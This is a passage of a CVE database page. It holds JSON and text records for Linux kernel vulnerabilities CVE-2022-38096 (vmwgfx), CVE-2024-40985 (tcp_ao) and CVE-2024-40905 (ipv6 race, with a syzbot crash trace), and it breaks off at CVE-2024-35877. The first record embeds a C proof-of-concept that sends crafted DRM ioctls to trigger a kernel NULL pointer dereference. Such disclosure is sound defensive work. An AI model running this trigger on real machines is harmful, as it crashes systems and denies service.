          "value": "#include \u003cstdio.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cerrno.h\u003e\n\n#include \u003clinux/if_tun.h\u003e\n#include \u003cnet/if.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003csys/stat.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003csys/socket.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cstdlib.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003cerrno.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003cstdint.h\u003e\n#include \u003cnetinet/ip.h\u003e\n#include \u003csys/resource.h\u003e\n#include \u003csys/syscall.h\u003e\n#include \u003climits.h\u003e\n#include \u003csys/mman.h\u003e\n\n#include \u003clinux/fs.h\u003e\nint fd = 0;\ntypedef struct mixer\n{\n\tint index;\n\tint fd;\n\tchar *msg;\n}mixer_t;\n\nstruct drm_vmw_surface_create_req {\n\t__u32 flags;\n\t__u32 format;\n\t__u32 mip_levels[6];\n\t__u64 size_addr;\n\t__s32 shareable;\n\t__s32 scanout;\n};\nstruct drm_vmw_execbuf_arg {\n\t__u64 commands;\n\t__u32 command_size;\n\t__u32 throttle_us;\n\t__u64 fence_rep;\n\t__u32 version;\n\t__u32 flags;\n\t__u32 context_handle;\n\t__s32 imported_fence_fd;\n};\nvoid init(){\nif ((fd = open(\"/dev/dri/renderD128\", O_RDWR)) == -1)\n                {\n                        printf(\"open tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n       \n}\nvoid poc(int sid){  \nint cmd[0x1000]={0};\ncmd[0]=1165;\ncmd[1]=0x50;\ncmd[2]=0x0;\ncmd[3]=0x0;\ncmd[4]=-1;\nstruct drm_vmw_execbuf_arg arg={0};\n\targ.commands=cmd;\n\targ.command_size=0x100;\n\targ.version=2;  \n\targ.context_handle=sid;\n                if (ioctl(fd, 0x4028644C, \u0026arg) == -1)\n                {\n                        printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n\n}\nint alloc_context(){\n\nint arg[0x10]={0};\narg[0]=0;\narg[1]=0x100;\n\nif (ioctl(fd, 0x80086447, \u0026arg) == -1)\n                {\n                        printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n   return arg[0];         \n}\n\nint alloc_bo(){\n\nint arg[0x10]={0};\narg[0]=0x10000;\nif (ioctl(fd, 0xC0186441, \u0026arg) == -1)\n                {\n                        printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n   return arg[2];         \n}\n\nint create_surface(){\nint buf[0x100]={0};\nbuf[0]=64;\nbuf[1]=64;\nbuf[2]=64;\n\nstruct drm_vmw_surface_create_req arg={0};\narg.flags=0;\narg.format=2;\narg.mip_levels[0]=1;\narg.size_addr=buf;\narg.shareable=0;\narg.scanout=0x10;\n\nif (ioctl(fd, 0xC0306449, \u0026arg) == -1)\n                {\n                        printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\nreturn arg.flags;\n}\nint main(int ac, char **argv)\n{\ninit();\nint cid=alloc_context();  \n  printf(\"%d\",cid);     \n    poc(cid);            \n  \n}"
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 6.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-476",
              "description": "CWE-476 NULL Pointer Dereference",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2024-06-25T21:08:05.642043",
        "orgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e",
        "shortName": "Anolis"
      },
      "references": [
        {
          "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2073"
        },
        {
          "name": "[debian-lts-announce] 20240625 [SECURITY] [DLA 3842-1] linux-5.10 security update",
          "tags": [
            "mailing-list"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
        }
      ],
      "source": {
        "defect": [
          "https://bugzilla.openanolis.cn/show_bug.cgi?id=2073"
        ],
        "discovery": "INTERNAL"
      },
      "title": "There is a NULL pointer vulnerability in vmwgfx driver",
      "x_generator": {
        "engine": "Vulnogram 0.0.9"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e",
    "assignerShortName": "Anolis",
    "cveId": "CVE-2022-38096",
    "datePublished": "2022-09-09T14:39:51.163117Z",
    "dateReserved": "2022-09-07T00:00:00",
    "dateUpdated": "2024-09-16T19:46:43.355Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-40985 (GCVE-0-2024-40985)

Vulnerability from cvelistv5 – Published: 2024-07-12 12:37 – Updated: 2025-05-04 09:19

Title

net/tcp_ao: Don't leak ao_info on error-path

Summary

In the Linux kernel, the following vulnerability has been resolved: net/tcp_ao: Don't leak ao_info on error-path It seems I introduced it together with TCP_AO_CMDF_AO_REQUIRED, on version 5 [1] of TCP-AO patches. Quite frustrative that having all these selftests that I've written, running kmemtest & kcov was always in todo. [1]: https://lore.kernel.org/netdev/20230215183335.800122-5-dima@arista.com/

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/ebaa7d3c26332330a…
	https://git.kernel.org/stable/c/f9ae848904289ddb1…

Impacted products

Vendor

Product

Version

Linux

Affected: 0aadc73995d08f6b0dc061c14a564ffa46f5914e , < ebaa7d3c26332330a48f9a15f8e518d526cc0f21 (git)
Affected: 0aadc73995d08f6b0dc061c14a564ffa46f5914e , < f9ae848904289ddb16c7c9e4553ed4c64300de49 (git)

Linux

Affected: 6.7
Unaffected: 0 , < 6.7 (semver)
Unaffected: 6.9.7 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T04:39:56.072Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ebaa7d3c26332330a48f9a15f8e518d526cc0f21"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f9ae848904289ddb16c7c9e4553ed4c64300de49"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-40985",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:02:07.158782Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:20.918Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/ipv4/tcp_ao.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "ebaa7d3c26332330a48f9a15f8e518d526cc0f21",
              "status": "affected",
              "version": "0aadc73995d08f6b0dc061c14a564ffa46f5914e",
              "versionType": "git"
            },
            {
              "lessThan": "f9ae848904289ddb16c7c9e4553ed4c64300de49",
              "status": "affected",
              "version": "0aadc73995d08f6b0dc061c14a564ffa46f5914e",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/ipv4/tcp_ao.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.7"
            },
            {
              "lessThan": "6.7",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.7",
                  "versionStartIncluding": "6.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "6.7",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/tcp_ao: Don\u0027t leak ao_info on error-path\n\nIt seems I introduced it together with TCP_AO_CMDF_AO_REQUIRED, on\nversion 5 [1] of TCP-AO patches. Quite frustrative that having all these\nselftests that I\u0027ve written, running kmemtest \u0026 kcov was always in todo.\n\n[1]: https://lore.kernel.org/netdev/20230215183335.800122-5-dima@arista.com/"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:19:22.334Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/ebaa7d3c26332330a48f9a15f8e518d526cc0f21"
        },
        {
          "url": "https://git.kernel.org/stable/c/f9ae848904289ddb16c7c9e4553ed4c64300de49"
        }
      ],
      "title": "net/tcp_ao: Don\u0027t leak ao_info on error-path",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-40985",
    "datePublished": "2024-07-12T12:37:31.133Z",
    "dateReserved": "2024-07-12T12:17:45.605Z",
    "dateUpdated": "2025-05-04T09:19:22.334Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-40905 (GCVE-0-2024-40905)

Vulnerability from cvelistv5 – Published: 2024-07-12 12:20 – Updated: 2025-11-03 21:57

Title

ipv6: fix possible race in __fib6_drop_pcpu_from()

Summary

In the Linux kernel, the following vulnerability has been resolved: ipv6: fix possible race in __fib6_drop_pcpu_from() syzbot found a race in __fib6_drop_pcpu_from() [1] If compiler reads more than once (*ppcpu_rt), second read could read NULL, if another cpu clears the value in rt6_get_pcpu_route(). Add a READ_ONCE() to prevent this race. Also add rcu_read_lock()/rcu_read_unlock() because we rely on RCU protection while dereferencing pcpu_rt. [1] Oops: general protection fault, probably for non-canonical address 0xdffffc0000000012: 0000 [#1] PREEMPT SMP KASAN PTI KASAN: null-ptr-deref in range [0x0000000000000090-0x0000000000000097] CPU: 0 PID: 7543 Comm: kworker/u8:17 Not tainted 6.10.0-rc1-syzkaller-00013-g2bfcfd584ff5 #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 04/02/2024 Workqueue: netns cleanup_net RIP: 0010:__fib6_drop_pcpu_from.part.0+0x10a/0x370 net/ipv6/ip6_fib.c:984 Code: f8 48 c1 e8 03 80 3c 28 00 0f 85 16 02 00 00 4d 8b 3f 4d 85 ff 74 31 e8 74 a7 fa f7 49 8d bf 90 00 00 00 48 89 f8 48 c1 e8 03 <80> 3c 28 00 0f 85 1e 02 00 00 49 8b 87 90 00 00 00 48 8b 0c 24 48 RSP: 0018:ffffc900040df070 EFLAGS: 00010206 RAX: 0000000000000012 RBX: 0000000000000001 RCX: ffffffff89932e16 RDX: ffff888049dd1e00 RSI: ffffffff89932d7c RDI: 0000000000000091 RBP: dffffc0000000000 R08: 0000000000000005 R09: 0000000000000007 R10: 0000000000000001 R11: 0000000000000006 R12: ffff88807fa080b8 R13: fffffbfff1a9a07d R14: ffffed100ff41022 R15: 0000000000000001 FS: 0000000000000000(0000) GS:ffff8880b9200000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000001b32c26000 CR3: 000000005d56e000 CR4: 00000000003526f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: <TASK> __fib6_drop_pcpu_from net/ipv6/ip6_fib.c:966 [inline] fib6_drop_pcpu_from net/ipv6/ip6_fib.c:1027 [inline] fib6_purge_rt+0x7f2/0x9f0 net/ipv6/ip6_fib.c:1038 fib6_del_route net/ipv6/ip6_fib.c:1998 [inline] fib6_del+0xa70/0x17b0 net/ipv6/ip6_fib.c:2043 fib6_clean_node+0x426/0x5b0 net/ipv6/ip6_fib.c:2205 fib6_walk_continue+0x44f/0x8d0 net/ipv6/ip6_fib.c:2127 fib6_walk+0x182/0x370 net/ipv6/ip6_fib.c:2175 fib6_clean_tree+0xd7/0x120 net/ipv6/ip6_fib.c:2255 __fib6_clean_all+0x100/0x2d0 net/ipv6/ip6_fib.c:2271 rt6_sync_down_dev net/ipv6/route.c:4906 [inline] rt6_disable_ip+0x7ed/0xa00 net/ipv6/route.c:4911 addrconf_ifdown.isra.0+0x117/0x1b40 net/ipv6/addrconf.c:3855 addrconf_notify+0x223/0x19e0 net/ipv6/addrconf.c:3778 notifier_call_chain+0xb9/0x410 kernel/notifier.c:93 call_netdevice_notifiers_info+0xbe/0x140 net/core/dev.c:1992 call_netdevice_notifiers_extack net/core/dev.c:2030 [inline] call_netdevice_notifiers net/core/dev.c:2044 [inline] dev_close_many+0x333/0x6a0 net/core/dev.c:1585 unregister_netdevice_many_notify+0x46d/0x19f0 net/core/dev.c:11193 unregister_netdevice_many net/core/dev.c:11276 [inline] default_device_exit_batch+0x85b/0xae0 net/core/dev.c:11759 ops_exit_list+0x128/0x180 net/core/net_namespace.c:178 cleanup_net+0x5b7/0xbf0 net/core/net_namespace.c:640 process_one_work+0x9fb/0x1b60 kernel/workqueue.c:3231 process_scheduled_works kernel/workqueue.c:3312 [inline] worker_thread+0x6c8/0xf70 kernel/workqueue.c:3393 kthread+0x2c1/0x3a0 kernel/kthread.c:389 ret_from_fork+0x45/0x80 arch/x86/kernel/process.c:147 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:244

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/c90af1cced2f669a7…
	https://git.kernel.org/stable/c/c693698787660c979…
	https://git.kernel.org/stable/c/a0bc020592b54a8f3…
	https://git.kernel.org/stable/c/2498960dac9b6fc49…
	https://git.kernel.org/stable/c/7e796c3fefa8b17b3…
	https://git.kernel.org/stable/c/09e5a5a80e2059221…
	https://git.kernel.org/stable/c/b01e1c030770ff3b4…

Impacted products

Vendor

Product

Version

Linux

Affected: d52d3997f843ffefaa8d8462790ffcaca6c74192 , < c90af1cced2f669a7b2304584be4ada495eaa0e5 (git)
Affected: d52d3997f843ffefaa8d8462790ffcaca6c74192 , < c693698787660c97950bc1f93a8dd19d8307153d (git)
Affected: d52d3997f843ffefaa8d8462790ffcaca6c74192 , < a0bc020592b54a8f3fa2b7f244b6e39e526c2e12 (git)
Affected: d52d3997f843ffefaa8d8462790ffcaca6c74192 , < 2498960dac9b6fc49b6d1574f7cd1a4872744adf (git)
Affected: d52d3997f843ffefaa8d8462790ffcaca6c74192 , < 7e796c3fefa8b17b30e7252886ae8cffacd2b9ef (git)
Affected: d52d3997f843ffefaa8d8462790ffcaca6c74192 , < 09e5a5a80e205922151136069e440477d6816914 (git)
Affected: d52d3997f843ffefaa8d8462790ffcaca6c74192 , < b01e1c030770ff3b4fe37fc7cc6bca03f594133f (git)

Linux

Affected: 4.2
Unaffected: 0 , < 4.2 (semver)
Unaffected: 5.4.279 , ≤ 5.4.* (semver)
Unaffected: 5.10.221 , ≤ 5.10.* (semver)
Unaffected: 5.15.162 , ≤ 5.15.* (semver)
Unaffected: 6.1.95 , ≤ 6.1.* (semver)
Unaffected: 6.6.35 , ≤ 6.6.* (semver)
Unaffected: 6.9.6 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T21:57:34.781Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c90af1cced2f669a7b2304584be4ada495eaa0e5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c693698787660c97950bc1f93a8dd19d8307153d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a0bc020592b54a8f3fa2b7f244b6e39e526c2e12"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2498960dac9b6fc49b6d1574f7cd1a4872744adf"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7e796c3fefa8b17b30e7252886ae8cffacd2b9ef"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/09e5a5a80e205922151136069e440477d6816914"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b01e1c030770ff3b4fe37fc7cc6bca03f594133f"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-40905",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:06:21.867829Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:38.202Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/ipv6/ip6_fib.c",
            "net/ipv6/route.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "c90af1cced2f669a7b2304584be4ada495eaa0e5",
              "status": "affected",
              "version": "d52d3997f843ffefaa8d8462790ffcaca6c74192",
              "versionType": "git"
            },
            {
              "lessThan": "c693698787660c97950bc1f93a8dd19d8307153d",
              "status": "affected",
              "version": "d52d3997f843ffefaa8d8462790ffcaca6c74192",
              "versionType": "git"
            },
            {
              "lessThan": "a0bc020592b54a8f3fa2b7f244b6e39e526c2e12",
              "status": "affected",
              "version": "d52d3997f843ffefaa8d8462790ffcaca6c74192",
              "versionType": "git"
            },
            {
              "lessThan": "2498960dac9b6fc49b6d1574f7cd1a4872744adf",
              "status": "affected",
              "version": "d52d3997f843ffefaa8d8462790ffcaca6c74192",
              "versionType": "git"
            },
            {
              "lessThan": "7e796c3fefa8b17b30e7252886ae8cffacd2b9ef",
              "status": "affected",
              "version": "d52d3997f843ffefaa8d8462790ffcaca6c74192",
              "versionType": "git"
            },
            {
              "lessThan": "09e5a5a80e205922151136069e440477d6816914",
              "status": "affected",
              "version": "d52d3997f843ffefaa8d8462790ffcaca6c74192",
              "versionType": "git"
            },
            {
              "lessThan": "b01e1c030770ff3b4fe37fc7cc6bca03f594133f",
              "status": "affected",
              "version": "d52d3997f843ffefaa8d8462790ffcaca6c74192",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/ipv6/ip6_fib.c",
            "net/ipv6/route.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.2"
            },
            {
              "lessThan": "4.2",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.279",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.221",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.162",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.95",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.35",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.6",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.279",
                  "versionStartIncluding": "4.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.221",
                  "versionStartIncluding": "4.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.162",
                  "versionStartIncluding": "4.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.95",
                  "versionStartIncluding": "4.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.35",
                  "versionStartIncluding": "4.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.6",
                  "versionStartIncluding": "4.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "4.2",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: fix possible race in __fib6_drop_pcpu_from()\n\nsyzbot found a race in __fib6_drop_pcpu_from() [1]\n\nIf compiler reads more than once (*ppcpu_rt),\nsecond read could read NULL, if another cpu clears\nthe value in rt6_get_pcpu_route().\n\nAdd a READ_ONCE() to prevent this race.\n\nAlso add rcu_read_lock()/rcu_read_unlock() because\nwe rely on RCU protection while dereferencing pcpu_rt.\n\n[1]\n\nOops: general protection fault, probably for non-canonical address 0xdffffc0000000012: 0000 [#1] PREEMPT SMP KASAN PTI\nKASAN: null-ptr-deref in range [0x0000000000000090-0x0000000000000097]\nCPU: 0 PID: 7543 Comm: kworker/u8:17 Not tainted 6.10.0-rc1-syzkaller-00013-g2bfcfd584ff5 #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 04/02/2024\nWorkqueue: netns cleanup_net\n RIP: 0010:__fib6_drop_pcpu_from.part.0+0x10a/0x370 net/ipv6/ip6_fib.c:984\nCode: f8 48 c1 e8 03 80 3c 28 00 0f 85 16 02 00 00 4d 8b 3f 4d 85 ff 74 31 e8 74 a7 fa f7 49 8d bf 90 00 00 00 48 89 f8 48 c1 e8 03 \u003c80\u003e 3c 28 00 0f 85 1e 02 00 00 49 8b 87 90 00 00 00 48 8b 0c 24 48\nRSP: 0018:ffffc900040df070 EFLAGS: 00010206\nRAX: 0000000000000012 RBX: 0000000000000001 RCX: ffffffff89932e16\nRDX: ffff888049dd1e00 RSI: ffffffff89932d7c RDI: 0000000000000091\nRBP: dffffc0000000000 R08: 0000000000000005 R09: 0000000000000007\nR10: 0000000000000001 R11: 0000000000000006 R12: ffff88807fa080b8\nR13: fffffbfff1a9a07d R14: ffffed100ff41022 R15: 0000000000000001\nFS:  0000000000000000(0000) GS:ffff8880b9200000(0000) knlGS:0000000000000000\nCS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000001b32c26000 CR3: 000000005d56e000 CR4: 00000000003526f0\nDR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\nDR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\nCall Trace:\n \u003cTASK\u003e\n  __fib6_drop_pcpu_from net/ipv6/ip6_fib.c:966 [inline]\n  fib6_drop_pcpu_from net/ipv6/ip6_fib.c:1027 [inline]\n  fib6_purge_rt+0x7f2/0x9f0 net/ipv6/ip6_fib.c:1038\n  fib6_del_route net/ipv6/ip6_fib.c:1998 [inline]\n  fib6_del+0xa70/0x17b0 net/ipv6/ip6_fib.c:2043\n  fib6_clean_node+0x426/0x5b0 net/ipv6/ip6_fib.c:2205\n  fib6_walk_continue+0x44f/0x8d0 net/ipv6/ip6_fib.c:2127\n  fib6_walk+0x182/0x370 net/ipv6/ip6_fib.c:2175\n  fib6_clean_tree+0xd7/0x120 net/ipv6/ip6_fib.c:2255\n  __fib6_clean_all+0x100/0x2d0 net/ipv6/ip6_fib.c:2271\n  rt6_sync_down_dev net/ipv6/route.c:4906 [inline]\n  rt6_disable_ip+0x7ed/0xa00 net/ipv6/route.c:4911\n  addrconf_ifdown.isra.0+0x117/0x1b40 net/ipv6/addrconf.c:3855\n  addrconf_notify+0x223/0x19e0 net/ipv6/addrconf.c:3778\n  notifier_call_chain+0xb9/0x410 kernel/notifier.c:93\n  call_netdevice_notifiers_info+0xbe/0x140 net/core/dev.c:1992\n  call_netdevice_notifiers_extack net/core/dev.c:2030 [inline]\n  call_netdevice_notifiers net/core/dev.c:2044 [inline]\n  dev_close_many+0x333/0x6a0 net/core/dev.c:1585\n  unregister_netdevice_many_notify+0x46d/0x19f0 net/core/dev.c:11193\n  unregister_netdevice_many net/core/dev.c:11276 [inline]\n  default_device_exit_batch+0x85b/0xae0 net/core/dev.c:11759\n  ops_exit_list+0x128/0x180 net/core/net_namespace.c:178\n  cleanup_net+0x5b7/0xbf0 net/core/net_namespace.c:640\n  process_one_work+0x9fb/0x1b60 kernel/workqueue.c:3231\n  process_scheduled_works kernel/workqueue.c:3312 [inline]\n  worker_thread+0x6c8/0xf70 kernel/workqueue.c:3393\n  kthread+0x2c1/0x3a0 kernel/kthread.c:389\n  ret_from_fork+0x45/0x80 arch/x86/kernel/process.c:147\n  ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:244"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:17:30.856Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/c90af1cced2f669a7b2304584be4ada495eaa0e5"
        },
        {
          "url": "https://git.kernel.org/stable/c/c693698787660c97950bc1f93a8dd19d8307153d"
        },
        {
          "url": "https://git.kernel.org/stable/c/a0bc020592b54a8f3fa2b7f244b6e39e526c2e12"
        },
        {
          "url": "https://git.kernel.org/stable/c/2498960dac9b6fc49b6d1574f7cd1a4872744adf"
        },
        {
          "url": "https://git.kernel.org/stable/c/7e796c3fefa8b17b30e7252886ae8cffacd2b9ef"
        },
        {
          "url": "https://git.kernel.org/stable/c/09e5a5a80e205922151136069e440477d6816914"
        },
        {
          "url": "https://git.kernel.org/stable/c/b01e1c030770ff3b4fe37fc7cc6bca03f594133f"
        }
      ],
      "title": "ipv6: fix possible race in __fib6_drop_pcpu_from()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-40905",
    "datePublished": "2024-07-12T12:20:45.832Z",
    "dateReserved": "2024-07-12T12:17:45.580Z",
    "dateUpdated": "2025-11-03T21:57:34.781Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-35877 (GCVE-0-2024-35877)

Vulnerability from cvelistv5 – Published: 2024-05-19 08:34 – Updated: 2025-05-04 09:07

Title

x86/mm/pat: fix VM_PAT handling in COW mappings

Summary

